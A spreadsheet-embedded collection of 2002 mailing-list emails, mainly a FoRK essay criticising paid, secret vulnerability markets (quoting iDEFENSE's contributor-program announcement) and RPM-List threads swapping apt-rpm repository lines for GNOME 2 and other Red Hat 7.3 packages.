vulnerability, if possible.  This method has proven far superior to the old paradigm established by
CERT in the late 1980s, which its proponents might call "responsible
disclosure" ---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wouldn't apply them because they didn't know how serious the problem
was.The underground computer criminal community would often discover and
exploit these same holes for months or years while the "responsible
disclosure" process kept their victims, who had no connections in the
underground, vulnerable.The problem with this is that vulnerabilities that are widely known
are much less dangerous, because their victims can take steps to
reduce their potential impact --- including disabling software,
turning off vulnerable features, filtering traffic in transit, and
detecting and responding to intrusions.  They are therefore much less
useful to would-be intruders.  Also, software companies usually see
security vulnerabilities in their software as PR problems, and so
prefer to delay publication (and the expense of fixing the bugs) as
long as possible.iDEFENSE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Hewlett-Packard to keep a vulnerability in HP's Tru64 Unix secret if
HP retained Snosoft's "consulting services".  HP considered this
extortion and responded with legal threats, and Snosoft published the
information.If this is allowed to happen, it will cause two problems which,
together, add up to a catastrophe.First, secret software vulnerability information will be available to
the highest bidder, and to nobody else.  For reasons explained later,
I think the highest bidders will generally be organized crime
syndicates, although that will not be obvious to the sellers.Second, finding software vulnerabilities and keeping them secret will
become lucrative for many more talented people.  The result will be
--- just as in the "responsible disclosure" days --- that the good
guys will remain vulnerable for months and years, while the majority
of current vulnerabilities are kept secret.I've heard it argued that the highest bidders will generally be the
vendors of the vulnerable software, but I don't think that's
plausible.  If someone can steal $20 000 because a software bug lets
them, the software vendor is never held liable; often, in fact, the
people who administer the software aren't liable, either --- when
credit card data are stolen from an e-commerce site, for example.
Knowing about a vulnerability before anyone else might save a web-site
administrator some time, and it might save the software vendor some
negative PR, but it can net the thief thousands of dollars.I think the highest bidders will be those for whom early vulnerability
information is most lucrative --- the thieves who can use it to
execute the largest heists without getting caught.  Inevitably, that
means organized crime syndicates, although the particular gangs who
are good at networked theft may not yet exist.There might be the occasional case where a market leader, such as
Microsoft, could make more money by giving their competitors bad PR
than a gang could make by theft.  Think of a remote-root hole in
Samba, for example.Right now, people who know how to find security exploits are either
motivated by personal interest in the subject, motivated by the public
interest, motivated by a desire for individual recognition, or
personally know criminals that benefit from their exploits.  Creating
a marketplace in secret vulnerability information would vastly
increase the availability of that information to the people who can
afford to pay the most for it: spies, terrorists, and organized crime.Let's not let that happen.
This is the original iDEFENSE announcement:From: Sunil James [mailto:SJames@iDefense.com]
Sent: Wednesday, August 07, 2002 12:32 PM
Subject: Introducing iDEFENSE's Vulnerability Contributor Program
Greetings,iDEFENSE is pleased to announce the official launch of its Vulnerability
Contributor Program (VCP). The VCP pays contributors for the advance
notification of vulnerabilities, exploit code and malicious code.iDEFENSE hopes you might consider contributing to the VCP. The following
provides answers to some basic questions about the program:Q. How will it work?
A. iDEFENSE understands the majority of security researchers do not publish
security research for compensation; rather, it could be for any of a number
of motivations, including the following:         * Pure love of security research
         * The desire to protect against harm to targeted networks
         * The desire to urge vendors to fix their products
         * The publicity that often accompanies disclosureThe VCP is for those who want to have their research made public to the
Internet community, but who would also like to be paid for doing the
work.The compensation will depend, among other things, on the following
items:         * The kind of information being shared (i.e. vulnerability or exploit)
         * The amount of detail and analysis provided
         * The potential severity level for the information shared
         * The types of applications, operating systems, and other
           software and hardware potentially affected
         * Verification by iDEFENSE Labs
         * The level of exclusivity, if any, for data granted to iDEFENSEQ. Who should contribute to the VCP?
A. The VCP is open to any individual, security research group or other
entity.Q. Why are you launching this program?
A. Timeliness remains a key aspect in security intelligence. Contributions
to some lists take time before publication to the public at large. More
often, many of these services charge clients for access without paying the
original contributor. Under the iDEFENSE program, the contributor is
compensated, iDEFENSE Labs verifies the issue, and iDEFENSE clients and the
public at large are warned in a timely manner.Q. Who gets the credit?
A. The contributor is always credited for discovering the vulnerability or
exploit information.Q. When can I contribute?
The VCP is active. You are welcome to begin contributing today.To learn more, go to http://www.idefense.com/contributor.html. If you have
questions or would like to sign up as a contributor to the VCP, please
contact us at contributor@idefense.com.Regards,Sunil James
Technical Analyst
iDEFENSE"iDEFENSE is a global security intelligence company that proactively
monitors sources throughout the world -- from technical vulnerabilities and
hacker profiling to the global spread of viruses and other malicious code.
The iALERT security intelligence service provides decision-makers, frontline
security professionals and network administrators with timely access to
actionable intelligence and decision support on cyber-related threats.
iDEFENSE Labs is the research wing that verifies vulnerabilities, examines
the behavior of exploits and other malicious code and discovers new
software/hardware weaknesses in a controlled lab environment."http://xent.com/mailman/listinfo/fork</t>
  </si>
  <si>
    <t>On Thu, 22 Aug 2002, Kragen Sitaker wrote:--]If this kind of secret traffic is allowed to continue, it will pose a
--]very serious threat to our computer communications infrastructure.The goverment mindset is now, If you know a vulnerability and let it on to
anyone BUT the manufacturer you are a criminal...end of story, go directly
to jail do not collect 200$ and tip a hat to the citizen infromants who
helped get you there.So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mine...and perhaps coopt it fromthe start.....There are two ways to fight the powers that be, from with out and from
with in...lets not turn a blind eye towards one becuase someone, yes
someone, will do the deed and if that someone does not have the "make em
weak for the revultion to come" mindset then we are all and truly doomed.Fight without
Fight within
and make some scratch on the differences between:)-
-tomwsmf
http://xent.com/mailman/listinfo/fork</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,akitogo is happy to announce that Jochen Becker has just finished a small
nice PHP interface which integrates Spammassassin in the webuser interface
from Communigate.It currently tested with RedHat,PHP and CGProWhat is does:
-------------
The users are able to:
- edit the blacklist and whitelist
- edit required hits (score)
- define a mailbox in which every spam mail is droppedSpamassassin settings made by the webinterfaxe are handled domain wide.You can download it from:
-------------------------
http://www.akitogo.com/download/spamAssassinCommunigateWebinterface.tar.gz
Enjoy,Gunnar Lieb, akitogo OHG-------------------------------------------------------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</si>
  <si>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Once upon a time, Matthias wrote :&gt; On Thu, 18 Jul 2002 13:00:29 +0200
&gt; Matthias Saou  wrote:
&gt; 
&gt; &gt; Once upon a time, Matthias wrote :
&gt; &gt; &gt; ..see subject.
&gt; &gt; ..see valhalla.freshrpms.net ;-)
&gt; 
&gt; Hi, Matthias,
&gt; 
&gt; You should temporarly remove gentoo 0.11.29 from valhalla.freshrpms.net.
&gt; This build (and 0.11.28) has a strong bug: Problems with copying "deep"
&gt; directories.
&gt; 
&gt; Have reported this to Emil, he looks currently into it, a fix should be
&gt; available soon..
&gt; 
&gt; SorryDone.
Well, I feel especially sorry for him since he already qualified 0.11.28 of
"brown paper bag" release because of the column header clicking bug :-((I'll put up the next version as soon as it's out hoping it'll fix all
current issues!Matthias--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</si>
  <si>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Sorry about that, new machine, had set the time right, forgot about the
date :(On Fri, 2002-07-19 at 09:29, Doug Stewart wrote:&gt; Set your clock to the correct time, for the love of
&gt; all things holy (and my sanity...)._______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">On Fri, 2002-07-19 at 09:09, Jesse Keating wrote:&gt; And you think a batch of gnome2 rpms is going to solve that?
&gt; (no offense)Not quite, but if I got gnome2 installed, then my guess is that gtk2
would also be fully installed, which would let me use the new pan.That and I'd like to try gnome2 anyway._______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">On Mon, 2002-07-22 at 06:50, che wrote:&gt; thats the correct lines to be added to sources.list for the repository
&gt; i just did a apt-get install gnome-session its still progressing :)Excellent - might give it a bash tonight :)
_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">On Sun, 21 Jul 2002 10:51:51 -0500
Brian Fahrlander  wrote:&gt; [branching the thread, here]
&gt; 
&gt;     I found another Ximian repository- I don't know if it works yet...
&gt; 
&gt; rpm     http://gstreamer.net/releases/redhat/ redhat-73-i386 deps
&gt; rpm-src http://gstreamer.net/releases/redhat/ redhat-73-i386 deps
&gt; 
&gt; rpm     http://gstreamer.net/releases/redhat/ redhat-73-i386 deps ximian
&gt; rpm-src http://gstreamer.net/releases/redhat/ redhat-73-i386 deps ximian
&gt; 
&gt; rpm     http://gstreamer.net/releases/redhat/ redhat-73-i386 deps gnomehide
&gt; rpm-src http://gstreamer.net/releases/redhat/ redhat-73-i386 deps gnomehide
&gt; 
&gt;     These guys are EXTREMELY apt-friendly.  Unlike most multimedia projects, they seem to prefer RPM/Apt over the older methods.  Isn't that cool?
&gt; 
&gt;     Hey- how would I have known to "apt-get install gnome-session" to kick all this off?
&gt; 
&gt; ------------------------------------------------------------------------
&gt; Brian FahrlÃ¤nder              Linux Zealot, Conservative, and Technomad
&gt; Evansville, IN                    My Voyage: http://www.CounterMoon.com
&gt; ICQ  5119262
&gt; ------------------------------------------------------------------------
&gt; I don't want to hear news from Isreal until the news contains the words
&gt; "Bullet", "Brain", and "Arafat".i took a look into the repository it "just" contains gstreamer and his dependecies
but thats nice for people who use it though :)thanks,
chepersonally i am capped to 16 kb/s upstream only :\ if i just had like 10 to 20 times of that i would run a repository for sure. i guess alot of people would love to even get daily builds (yes i know i deserve to be eaten for that idea because it would need alot of bandwidth) but well would still be nice :).
&gt; _______________________________________________
&gt; RPM-List mailing list 
&gt; http://lists.freshrpms.net/mailman/listinfo/rpm-list_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">On Mon, 2002-07-22 at 06:20, che wrote:&gt; The server mentioned above works again now :)!Any problems with the rpm's they provided?
_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">[branching the thread, here]    I found another Ximian repository- I don't know if it works yet...rpm     http://gstreamer.net/releases/redhat/ redhat-73-i386 deps
rpm-src http://gstreamer.net/releases/redhat/ redhat-73-i386 depsrpm     http://gstreamer.net/releases/redhat/ redhat-73-i386 deps ximian
rpm-src http://gstreamer.net/releases/redhat/ redhat-73-i386 deps ximianrpm     http://gstreamer.net/releases/redhat/ redhat-73-i386 deps gnomehide
rpm-src http://gstreamer.net/releases/redhat/ redhat-73-i386 deps gnomehide    These guys are EXTREMELY apt-friendly.  Unlike most multimedia projects, they seem to prefer RPM/Apt over the older methods.  Isn't that cool?    Hey- how would I have known to "apt-get install gnome-session" to kick all this off?------------------------------------------------------------------------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</si>
  <si>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Just for your information, I have an apt-repository for RH 7.3 at
http://utelsystems.dyndns.org
--
NOS@Utel.no_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">On Sun, 21 Jul 2002 05:11:08 -0400
che  wrote:The server mentioned above works again now :)!
_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">On Sun, 2002-07-21 at 09:11, Brian Fahrlander wrote:
&gt;
&gt;     Server problems? Or is this a way to limit bandwidth?"Captain, I sense a need to mirror...."   :-)If I wasn't on DSL I would.			-Chris
_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">On Sun, 2002-07-21 at 10:51, Brian Fahrlander wrote:
&gt; [branching the thread, here]
&gt; 
&gt;     I found another Ximian repository- I don't know if it works yet...And even one more at: http://apt-rpm.codefactory.se/  (rh7.2 + 7.3,
Ximian &amp; gnomehide).			-Chris_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">On Fri, 19 Jul 2002 18:40:52 +0200
Matthias Saou  wrote:&gt; I'll put up the next version as soon as it's out hoping it'll fix all
&gt; current issues!
Hi, Matthias,
gentoo 0.11.30 is out now and the 'copy nested directory' bug is fixed,
see ChangeLog onhttp://sourceforge.net/project/shownotes.php?group_id=32880&amp;release_id=100766
-- 
regards from Germany
                   Matthias_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">hello!
well in my eyes something like a public contrib repository would be nice (where everyone can at least upload spec files) and a something like a "repository directory" with a collection of available repositorys and their content.i am personally on a dsl dialup connection with 16kb/s upstream cap and that kinda sucks perhaps i am gonna still create a respository for small windowmaker dockapps in the future :).what do you think?thanks,
che_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">On 21 Jul 2002 23:59:59 +1200
Mark Derricutt  wrote:&gt; On Mon, 2002-07-22 at 06:20, che wrote:
&gt; 
&gt; &gt; The server mentioned above works again now :)!
&gt; 
&gt; Any problems with the rpm's they provided?
&gt; 
&gt; 
&gt; _______________________________________________
&gt; RPM-List mailing list 
&gt; http://lists.freshrpms.net/mailman/listinfo/rpm-list#redhat 7.3
rpm http://apt.sunnmore.net gnome2 73
rpm-src http://apt.sunnmore.net gnome2 73#redhat 7.2
rpm http://apt.sunnmore.net gnome2 72
rpm-src http://apt.sunnmore.net gnome2 72thats the correct lines to be added to sources.list for the repositoryi just did a apt-get install gnome-session its still progressing :)_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">[yes, I know I'm replying to myself!]&gt;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:)it sure would.
&gt;Also- I noticed this repo has about an 8K bandwidth.
I know, i know. Its an ADSL connection. Should habe 128K ;-(
Feel free to give me access to an web/ftp server with big pipes..-_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Once upon a time, Brian wrote :&gt;     Also- I noticed this repo has about an 8K bandwidth.  Is there a way
&gt;     I can put this behind the others, so I don't hammer it for things
&gt;     that are at other repos?  I'm respectful about bandwidth, having
&gt;     lived on dialup for so long.  Now I'm on fiber optic and it's a whole
&gt;     other world...Sure, just use "os" and "updates" from apt.freshrpms.net for instance then
add the lines for that repository with only the module you want/need (here
it's "testing73" I guess).Matthias--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</si>
  <si>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20 Jul 2002 17:17:59 -0500, Chris Weyl  wrote:&gt; Just a quick question....  does anyone know of a public Ximian apt/rpm
&gt; repository?
&gt; 
&gt; (I know, I know....  but some ppl kinda like it:-))    Yeah, I'm one of them.  Ximian, if it could be installed from Apt would be sweet- the graphics are done very, very well.  The usability is actually higher than most other environments.  But their installer really sucks.    If you find/setup one (and figure out how to install it) let me know.------------------------------------------------------------------------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</si>
  <si>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 Sun, Jul 21, 2002 at 09:11:08AM -0500, Brian Fahrlander wrote:
&gt; On Sun, 21 Jul 2002 15:12:11 -0400, che  wrote:
&gt; &gt; &gt; &gt; &gt; The server mentioned above works again now :)!
&gt; &gt; &gt; &gt; Any problems with the rpm's they provided?
&gt; &gt; &gt; #redhat 7.3
&gt; &gt; &gt; rpm http://apt.sunnmore.net gnome2 73
&gt; &gt; &gt; rpm-src http://apt.sunnmore.net gnome2 73
&gt; &gt; after apt-get install gnome-session
&gt;     Does it work more than once?
&gt;     Failed to fetch http://apt.sunnmore.net/gnome2/filename-here.rpm
&gt;    404 Not FoundI got that with the earlier URL. Those that say 73/72 at the end work,
though.I just installed gnome-terminal and I'm impressed by that. I have seom
gtk1 apps to rebuild and put into my own repository (like gaim) so I
didn't do the full session install. Besides, it's HUGE. And it wants to
install stuff like kudzu and parted and who knows what. What's wrong
with dynamic configuration? Dependency hell indeed.-- 
&gt; wd0: 1671040 partitions found
That's a lie. Ignore it.
		-- Seen on xMach mailing list
_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">On Sun, Jul 21, 2002 at 04:15:16PM -0500, Lance wrote:
&gt; So to update from GNOME 1.4 to 2.0, after modifying
&gt; /etc/apt/sources.list, I just issue 'apt-update' then 'apt-install
&gt; gnome-session' ?Apparently, yes. Though for me it did suggest all sorts of creepy stuff.
After installing packages one by one and removing some old stuff and
whatnot, the original gnome-session from there suddenly no longer
wanted parted and all that. Go figure.&gt; Also Gaim doesn't work with GNOME 2.0 just yet?If you strip out the gnome stuff, it still runs as a Gtk app without the
applet. Maybe you can even leave in the old panel and all that but I
think some files will conflict and have to be overridden with
--replace-files (dangerous). I just rebuilt gaim and made a few changes
to the .spec adding --without-gnome to %configure or such. It might be
nice to separate the panel version from the actual program like debian
does.Also, bubblemon no longer compiled for me and Yelp had some broken
dependency there.-- 
If you only want to go 500 miles, can you begin with a halfstep?_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">On Mon, 22 Jul 2002 09:42:18 +0200, "Nils O. SelÃ¥sdal"  wrote:&gt; Just for your information, I have an apt-repository for RH 7.3 at
&gt; http://utelsystems.dyndns.org
&gt; --
&gt; NOS@Utel.no    Your page has a typo;http://utelsystems.dyndns.org lists:
    rpm http://utelsystems.dyndns.org/apt redhat testingrh73
    rpm-src http://utelsystems.dyndns.org/apt redhat testing73  &lt;--    This is why I'm so stubborn about using cut-and-paste; not only is it easy, it's typo-free.  :)Wouldn't it be nice if there was a way to manage these automagically?  Some central site to make them available to the rest of the world, every time there's a "apt-get update"?  :)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</si>
  <si>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 Mon, 22 Jul 2002 06:16:19 -0500, Brian Fahrlander  wrote:[yes, I know I'm replying to myself!]&gt;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Also- I noticed this repo has about an 8K bandwidth.  Is there a way I can put this behind the others, so I don't hammer it for things that are at other repos?  I'm respectful about bandwidth, having lived on dialup for so long.  Now I'm on fiber optic and it's a whole other world...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</si>
  <si>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 Sun, 21 Jul 2002 14:50:13 -0400
che  wrote:&gt; On 21 Jul 2002 23:59:59 +1200
&gt; Mark Derricutt  wrote:
&gt; 
&gt; &gt; On Mon, 2002-07-22 at 06:20, che wrote:
&gt; &gt; 
&gt; &gt; &gt; The server mentioned above works again now :)!
&gt; &gt; 
&gt; &gt; Any problems with the rpm's they provided?
&gt; &gt; 
&gt; &gt; 
&gt; &gt; _______________________________________________
&gt; &gt; RPM-List mailing list 
&gt; &gt; http://lists.freshrpms.net/mailman/listinfo/rpm-list
&gt; 
&gt; #redhat 7.3
&gt; rpm http://apt.sunnmore.net gnome2 73
&gt; rpm-src http://apt.sunnmore.net gnome2 73
&gt; 
&gt; #redhat 7.2
&gt; rpm http://apt.sunnmore.net gnome2 72
&gt; rpm-src http://apt.sunnmore.net gnome2 72
&gt; 
&gt; thats the correct lines to be added to sources.list for the repository
&gt; 
&gt; i just did a apt-get install gnome-session its still progressing :)
&gt; after apt-get install gnome-session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&gt; _______________________________________________
&gt; RPM-List mailing list 
&gt; http://lists.freshrpms.net/mailman/listinfo/rpm-list_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">I found the following mentioned on a news.gnome.org usenet posting. 
I've not yet tried it thou.  AFAIK this is just the gnome2 rpms, but
there ximian's, don't know what else is on the apt repository either,
must take a look around.Mark# Gnome2 - mentioned on news.gnome.org
rpm http://apt.sunnmore.net/ gnome2 gnome2
rpm-src http://apt.sunnmore.net/ gnome2 gnome2On Sun, 2002-07-21 at 14:15, Brian Fahrlander wrote:
&gt; On 20 Jul 2002 17:17:59 -0500, Chris Weyl  wrote:
&gt; 
&gt; &gt; Just a quick question....  does anyone know of a public Ximian apt/rpm
&gt; &gt; repository?
&gt; &gt; 
&gt; &gt; (I know, I know....  but some ppl kinda like it:-))
&gt; 
&gt;     Yeah, I'm one of them.  Ximian, if it could be installed from Apt would be sweet- the graphics are done very, very well.  The usability is actually higher than most other environments.  But their installer really sucks.
&gt; 
&gt;     If you find/setup one (and figure out how to install it) let me know.
&gt; 
&gt; ------------------------------------------------------------------------
&gt; Brian FahrlÃ¤nder              Linux Zealot, Conservative, and Technomad
&gt; Evansville, IN                    My Voyage: http://www.CounterMoon.com
&gt; ICQ  5119262
&gt; ------------------------------------------------------------------------
&gt; I don't want to hear news from Isreal until the news contains the words
&gt; "Bullet", "Brain", and "Arafat".
&gt; 
&gt; _______________________________________________
&gt; RPM-List mailing list 
&gt; http://lists.freshrpms.net/mailman/listinfo/rpm-list
&gt; _______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">On Sun, 21 Jul 2002 15:12:11 -0400, che  wrote:&gt; &gt; &gt; &gt; The server mentioned above works again now :)!
&gt; &gt; &gt; 
&gt; &gt; &gt; Any problems with the rpm's they provided?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Does it work more than once?    Failed to fetch http://apt.sunnmore.net/gnome2/filename-here.rpm
   404 Not Found
    :)    Server problems? Or is this a way to limit bandwidth?------------------------------------------------------------------------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</si>
  <si>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 21 Jul 2002 14:20:42 +1200
Mark Derricutt  wrote:&gt; I found the following mentioned on a news.gnome.org usenet posting. 
&gt; I've not yet tried it thou.  AFAIK this is just the gnome2 rpms, but
&gt; there ximian's, don't know what else is on the apt repository either,
&gt; must take a look around.
&gt; 
&gt; Mark
&gt; 
&gt; # Gnome2 - mentioned on news.gnome.org
&gt; rpm http://apt.sunnmore.net/ gnome2 gnome2
&gt; rpm-src http://apt.sunnmore.net/ gnome2 gnome2
&gt; 
&gt; On Sun, 2002-07-21 at 14:15, Brian Fahrlander wrote:
&gt; &gt; On 20 Jul 2002 17:17:59 -0500, Chris Weyl  wrote:
&gt; &gt; 
&gt; &gt; &gt; Just a quick question....  does anyone know of a public Ximian apt/rpm
&gt; &gt; &gt; repository?
&gt; &gt; &gt; 
&gt; &gt; &gt; (I know, I know....  but some ppl kinda like it:-))
&gt; &gt; 
&gt; &gt;     Yeah, I'm one of them.  Ximian, if it could be installed from Apt would be sweet- the graphics are done very, very well.  The usability is actually higher than most other environments.  But their installer really sucks.
&gt; &gt; 
&gt; &gt;     If you find/setup one (and figure out how to install it) let me know.
&gt; &gt; 
&gt; &gt; ------------------------------------------------------------------------
&gt; &gt; Brian FahrlÃ¤nder              Linux Zealot, Conservative, and Technomad
&gt; &gt; Evansville, IN                    My Voyage: http://www.CounterMoon.com
&gt; &gt; ICQ  5119262
&gt; &gt; ------------------------------------------------------------------------
&gt; &gt; I don't want to hear news from Isreal until the news contains the words
&gt; &gt; "Bullet", "Brain", and "Arafat".
&gt; &gt; 
&gt; &gt; _______________________________________________
&gt; &gt; RPM-List mailing list 
&gt; &gt; http://lists.freshrpms.net/mailman/listinfo/rpm-list
&gt; &gt; 
&gt; 
&gt; 
Would be very nice indeed but the server doesent work for me :\
cant connect to the server! anyone else got a hint?thanks,
che
&gt; 
&gt; _______________________________________________
&gt; RPM-List mailing list 
&gt; http://lists.freshrpms.net/mailman/listinfo/rpm-list_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">So to update from GNOME 1.4 to 2.0, after modifying
/etc/apt/sources.list, I just issue 'apt-update' then 'apt-install
gnome-session' ?  Also Gaim doesn't work with GNOME 2.0 just yet?On Sun, 2002-07-21 at 14:12, che wrote:
&gt; On Sun, 21 Jul 2002 14:50:13 -0400
&gt; che  wrote:
&gt; 
&gt; &gt; On 21 Jul 2002 23:59:59 +1200
&gt; &gt; Mark Derricutt  wrote:
&gt; &gt; 
&gt; &gt; &gt; On Mon, 2002-07-22 at 06:20, che wrote:
&gt; &gt; &gt; 
&gt; &gt; &gt; &gt; The server mentioned above works again now :)!
&gt; &gt; &gt; 
&gt; &gt; &gt; Any problems with the rpm's they provided?
&gt; &gt; &gt; 
&gt; &gt; &gt; 
&gt; &gt; &gt; _______________________________________________
&gt; &gt; &gt; RPM-List mailing list 
&gt; &gt; &gt; http://lists.freshrpms.net/mailman/listinfo/rpm-list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&gt; 
&gt; thanks in advance,
&gt; che
&gt; &gt; _______________________________________________
&gt; &gt; RPM-List mailing list 
&gt; &gt; http://lists.freshrpms.net/mailman/listinfo/rpm-list
&gt; 
&gt; _______________________________________________
&gt; RPM-List mailing list 
&gt; http://lists.freshrpms.net/mailman/listinfo/rpm-list
-- 
:
####[ Linux One Stanza Tip (LOST) ]###########################Sub : DOS to Unix conversion (#3)                    LOST #137DOS text files with ^M can be cleared by pico editor. Load the
dos text file in pico, Do a small edit job on it.  (e.g. place
a space and delete it again) .. Save .. Quit. All ^Ms gone !!########################################
:
_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">well, from the looks of things, Evolution mail client isn't supported
just yet, so I reckon I'll wait a bit.  Whoever posted these gnome2 apt
repositories, thanks!!!LanceOn Mon, 2002-07-22 at 04:41, Harri Haataja wrote:
&gt; On Sun, Jul 21, 2002 at 04:15:16PM -0500, Lance wrote:
&gt; &gt; So to update from GNOME 1.4 to 2.0, after modifying
&gt; &gt; /etc/apt/sources.list, I just issue 'apt-update' then 'apt-install
&gt; &gt; gnome-session' ?
&gt; 
&gt; Apparently, yes. Though for me it did suggest all sorts of creepy stuff.
&gt; After installing packages one by one and removing some old stuff and
&gt; whatnot, the original gnome-session from there suddenly no longer
&gt; wanted parted and all that. Go figure.
&gt; 
&gt; &gt; Also Gaim doesn't work with GNOME 2.0 just yet?
&gt; 
&gt; If you strip out the gnome stuff, it still runs as a Gtk app without the
&gt; applet. Maybe you can even leave in the old panel and all that but I
&gt; think some files will conflict and have to be overridden with
&gt; --replace-files (dangerous). I just rebuilt gaim and made a few changes
&gt; to the .spec adding --without-gnome to %configure or such. It might be
&gt; nice to separate the panel version from the actual program like debian
&gt; does.
&gt; 
&gt; Also, bubblemon no longer compiled for me and Yelp had some broken
&gt; dependency there.
&gt; 
&gt; -- 
&gt; If you only want to go 500 miles, can you begin with a halfstep?
&gt; 
&gt; _______________________________________________
&gt; RPM-List mailing list 
&gt; http://lists.freshrpms.net/mailman/listinfo/rpm-list
-- 
:
####[ Linux One Stanza Tip (LOST) ]###########################Sub : DOS to Unix conversion (#3)                    LOST #137DOS text files with ^M can be cleared by pico editor. Load the
dos text file in pico, Do a small edit job on it.  (e.g. place
a space and delete it again) .. Save .. Quit. All ^Ms gone !!########################################
:
_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">gaim official apt-rpm repositorys :)#gaim
rpm http://gaim.sourceforge.net/apt redhat/7.3/en/i386 release
rpm-src http://gaim.sourceforge.net/apt redhat/7.3/en/i386 releasethought i should post that one too just fell over it :)bye,
che_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">On Mon, 22 Jul 2002 14:40:04 -0400, che  wrote:&gt; hello!
&gt; well in my eyes something like a public contrib repository would be nice (where everyone can at least upload spec files) and a something like a "repository directory" with a collection of available repositorys and their content.
&gt; 
&gt; i am personally on a dsl dialup connection with 16kb/s upstream cap and that kinda sucks perhaps i am gonna still create a respository for small windowmaker dockapps in the future :).
&gt; 
&gt; what do you think?    I was thinkinf about an addition of another file: apt-repositories. Stick it on apt.freshmeat.net (the center of the apt universe, IMHO) and every time a new repository is added, the RPM can be rebuilt.  Heck, if I could get out of my depression, I could make the whole submission process automated....even making the RPM...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</si>
  <si>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Once upon a time, Brian wrote :&gt;     I was thinkinf about an addition of another file: apt-repositories.
&gt;     Stick it on apt.freshmeat.net (the center of the apt universe, IMHO)
&gt;     and every time a new repository is added, the RPM can be rebuilt. 
&gt;     Heck, if I could get out of my depression, I could make the whole
&gt;     submission process automated....even making the RPM...Well, I already keep a list of known apt repositories on
http://freshrpms.net/apt/ although I haven't added the ones that were
talked about lately (actually I've been very busy over the week-end and I'm
sick right now...).You could make the whole submission automated, even making the rpm?http://rpmforge.net/ needs *you*!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</si>
  <si>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Thanks for this, Matthias!  Hope you feel better.LanceOn Tue, 2002-07-23 at 04:50, Matthias Saou wrote:
&gt; Once upon a time, Brian wrote :
&gt; 
&gt; &gt;     I was thinkinf about an addition of another file: apt-repositories.
&gt; &gt;     Stick it on apt.freshmeat.net (the center of the apt universe, IMHO)
&gt; &gt;     and every time a new repository is added, the RPM can be rebuilt. 
&gt; &gt;     Heck, if I could get out of my depression, I could make the whole
&gt; &gt;     submission process automated....even making the RPM...
&gt; 
&gt; Well, I already keep a list of known apt repositories on
&gt; http://freshrpms.net/apt/ although I haven't added the ones that were
&gt; talked about lately (actually I've been very busy over the week-end and I'm
&gt; sick right now...).
&gt; 
&gt; You could make the whole submission automated, even making the rpm?
&gt; 
&gt; http://rpmforge.net/ needs *you*!
&gt;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
-- 
:
####[ Linux One Stanza Tip (LOST) ]###########################Sub : Knowing contents of .tgz files                 LOST #015To know the contents of a .tgz file without decompressing: $tar -ztvf filename.tgz | less          A .tgz file is essentially a gzipped tarball (.tar.gz) file.########################################
:
_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Seems like irssi.org also has an apt-rpm repository for snapshots of irssi:rpm http://ninja.no/apt 7.3/i386 irssi
rpm-src http://ninja.no/apt 7.3/i386 irssi_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Sadly, the last time I looked at it, it was only the console irssi client, 
no X :(--On Wednesday, July 24, 2002 00:18:27 +0200 Roy-Magne Mo 
 wrote:&gt; Seems like irssi.org also has an apt-rpm repository for snapshots of
&gt; irssi:_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Lance (lance_tt@bellsouth.net) wrote*:
&gt;
&gt;well, from the looks of things, Evolution mail client isn't supported
&gt;just yet, so I reckon I'll wait a bit.  Whoever posted these gnome2 apt
&gt;repositories, thanks!!!
